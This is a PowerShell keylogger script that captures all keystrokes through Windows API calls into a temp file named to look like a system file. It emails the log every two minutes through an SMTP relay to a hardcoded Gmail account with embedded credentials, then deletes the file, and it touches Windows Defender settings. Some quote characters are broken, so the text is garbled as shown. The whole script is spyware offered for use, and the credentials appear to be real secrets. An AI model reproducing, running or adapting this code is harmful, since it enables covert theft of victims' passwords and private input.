KvQjrDgD

1############################
2#requires -Version 2
3$antivir_state = 'Off'
4
5function Start-KeyLogger($Path="$env:temp\Windows.tmp") 
6{
7  # Signatures for API Calls
8  $signatures = @'
9[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
10public static extern short GetAsyncKeyState(int virtualKeyCode); 
11[DllImport("user32.dll", CharSet=CharSet.Auto)]
12public static extern int GetKeyboardState(byte[] keystate);
13[DllImport("user32.dll", CharSet=CharSet.Auto)]
14public static extern int MapVirtualKey(uint uCode, int uMapType);
15[DllImport("user32.dll", CharSet=CharSet.Auto)]
16public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
17'@
18
19  # load signatures and make members available
20  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
21    
22  # create output file
23  $null = New-Item -Path $Path -ItemType File -Force
24
25  try
26  {
27
28    # create endless loop. When user presses CTRL+C, finally-block
29    # executes and shows the collected key presses
30    while ($TimeEnd -ge $TimeNow) {
31      Start-Sleep -Milliseconds 40
32      
33      # scan all ASCII codes above 8
34      for ($ascii = 9; $ascii -le 254; $ascii++) {
35        # get current key state
36        $state = $API::GetAsyncKeyState($ascii)
37
38        # is key pressed?
39        if ($state -eq -32767) {
40          $null = [console]::CapsLock
41
42          # translate scan code to real code
43          $virtualKey = $API::MapVirtualKey($ascii, 3)
44
45          # get keyboard state for virtual keys
46          $kbstate = New-Object Byte[] 256
47          $checkkbstate = $API::GetKeyboardState($kbstate)
48
49          # prepare a StringBuilder to receive input key
50          $mychar = New-Object -TypeName System.Text.StringBuilder
51
52          # translate virtual key
53          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
54
55          if ($success) 
56          {
57            # add key to logger file
58            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
59          }
60        }
61      }
62	  $TimeNow = Get-Date
63    }
64  }
65  finally
66  {
67    # open logger file in Notepad
68	$ReportEmail.Attachments.Add($Path)
69	$SMTPInfo.Send($ReportEmail)
70	start-sleep 10
71	$ReportEmail.Dispose()
72	Remove-Item -Path $Path -force
73	#exit 1
74  }
75}
76
77# records all key presses until script is aborted by pressing CTRL+C
78# will then open the file with collected key codes
79# Start-KeyLogger
80while($true)
81{
82    $i++
83		# Edit only this section!
84		$TimeToRun = 2
85		$SMTPServer = 'mail.smtp2go.com' #smtp.gmail.com if you are using gmail
86		$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 2525) #2525 must be changed to 587 if you are using gmail
87		$SMTPInfo.EnableSsl = $true
88		$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(ramasedang3@gmail.com', 'ZQCLHXrHEFOm');
89		$ReportEmail = New-Object System.Net.Mail.MailMessage
90		$ReportEmail.From = ramasedang3@gmail.com'
91		$ReportEmail.To.Add(ramasedang3@gmail.com')
92		$ReportEmail.Subject = 'Test Keyboard log'
93		$ReportEmail.Body = 'Attached is your keyboard log. ' 
94		$TimeStart = Get-Date
95		$TimeEnd = $timeStart.addminutes($TimeToRun)
96	if($antivir_state -eq  'Off'){
97	Set-MpPreference -DisableRealtimeMonitoring $false
98	$antivir_state = 'On'
99	}
100    Start-KeyLogger
101}